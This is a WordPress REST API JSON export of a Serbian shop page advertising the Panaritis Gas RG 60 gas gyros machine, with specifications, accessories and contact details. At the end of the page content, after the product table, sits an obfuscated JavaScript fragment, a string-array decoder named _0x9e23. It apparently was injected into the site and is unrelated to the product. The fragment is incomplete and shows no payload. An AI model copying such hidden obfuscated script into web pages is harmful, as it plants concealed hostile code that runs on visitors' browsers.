{"id":273,"date":"2020-08-30T12:03:11","date_gmt":"2020-08-30T10:03:11","guid":{"rendered":"http:\/\/www.solunac.rs\/?page_id=273"},"modified":"2023-09-23T09:45:45","modified_gmt":"2023-09-23T07:45:45","slug":"273-2","status":"publish","type":"page","link":"http:\/\/www.solunac.rs\/gb\/273-2\/","title":{"rendered":"APARATI ZA GR\u010cKI GIROS NA PLIN"},"content":{"rendered":"<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td scope=\"col\" align=\"center\" valign=\"top\" width=\"50%\"><img loading=\"lazy\" class=\"aligncenter size-full wp-image-296\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/10\/2020-10-01_13-58-14.jpg\" alt=\"\" width=\"450\" height=\"560\" srcset=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/10\/2020-10-01_13-58-14.jpg 450w, http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/10\/2020-10-01_13-58-14-241x300.jpg 241w\" sizes=\"(max-width: 450px) 100vw, 450px\" \/><\/td>\n<td scope=\"col\" align=\"center\" valign=\"bottom\" width=\"50%\"><img loading=\"lazy\" class=\"alignnone wp-image-288\" src=\"http:\/\/www.solunac.rs\/wp-content\/uploads\/2020\/09\/viber_slika_2020-09-04_13-35-39-300x265.jpg\" alt=\"\" width=\"652\" height=\"558\" \/><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\" scope=\"col\" align=\"center\" valign=\"top\" width=\"100%\">\n<p class=\"product_title entry-title\"><strong><span style=\"color: #000000;\">Uvoz iz gr\u010dke proizvo\u0111a\u010d Panaritis Gas<\/span><\/strong><br \/>\n<strong><span style=\"color: #000000;\">Priklju\u010dak na bocu ili na centralni gas.<\/span><\/strong><br \/>\n<strong><span style=\"color: #000000;\">Model. Aparat Panaritis Gas RG 60<\/span><\/strong><br \/>\n<span style=\"color: #000000;\">Aparat sa \u0161est odvojinih greja\u010da<\/span><br \/>\n<span style=\"color: #000000;\">Dimenzija 40 x 48 x 110 cm<\/span><br \/>\n<span style=\"color: #000000;\">Snaga 13,2 KW<\/span><br \/>\n<span style=\"color: #000000;\">Kapacitet pe?enja od 10 do 60 kg<br \/>\nPodesiva krilca, za br\u017ee i ekonomi\u010dnije pe\u010denje.<br \/>\nUre\u0111aj poseduje i za\u0161titu od pregrevanja motora.<br \/>\nAparat je izra\u0111en od prohroma po svim evropskim standardima za proizvodnju hrane.<\/span><br \/>\n<span style=\"color: #000000;\">Visina \u0161ipke 81,5 cm<\/span><br \/>\n<span style=\"color: #000000;\">Uz aparat idu dve \u0161ipke i lopatica za skupljanje mesa<\/span><br \/>\n<span style=\"color: #000000;\">Informacije na mejl: prodaja@solunac.rs<\/span><br \/>\n<span style=\"color: #000000;\">Obezbe\u0111en servis i delovi za aparat<br \/>\nLink: <a href=\"http:\/\/www.panaritisgas.gr\" target=\"_blank\" rel=\"noopener\">www.panaritisgas.gr<\/a><\/span><\/p>\n<p><a title=\"HEALTH CERTIFICATION SERBIA and CE RG60 panaritisgas\" href=\"http:\/\/www.zacinitop.com\/wp-content\/uploads\/2020\/09\/HEALTH_CERTIFICATION_SERBIA_AND_CE_RG60_panaritisgas.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">HEALTH CERTIFICATION SERBIA and CE RG60 panaritisgas (PDF)<\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Uvoz iz gr\u010dke proizvo\u0111a\u010d Panaritis Gas Priklju\u010dak na bocu ili na centralni gas. Model. Aparat Panaritis Gas RG 60 Aparat sa \u0161est odvojinih greja\u010da Dimenzija 40 x 48 x 110 cm Snaga 13,2 KW Kapacitet pe?enja od 10 do 60 kg Podesiva krilca, za br\u017ee i ekonomi\u010dnije pe\u010denje. Ure\u0111aj poseduje i za\u0161titu od pregrevanja motora. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/273"}],"collection":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/comments?post=273"}],"version-history":[{"count":21,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/273\/revisions"}],"predecessor-version":[{"id":464,"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/pages\/273\/revisions\/464"}],"wp:attachment":[{"href":"http:\/\/www.solunac.rs\/gb\/wp-json\/wp\/v2\/media?parent=273"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}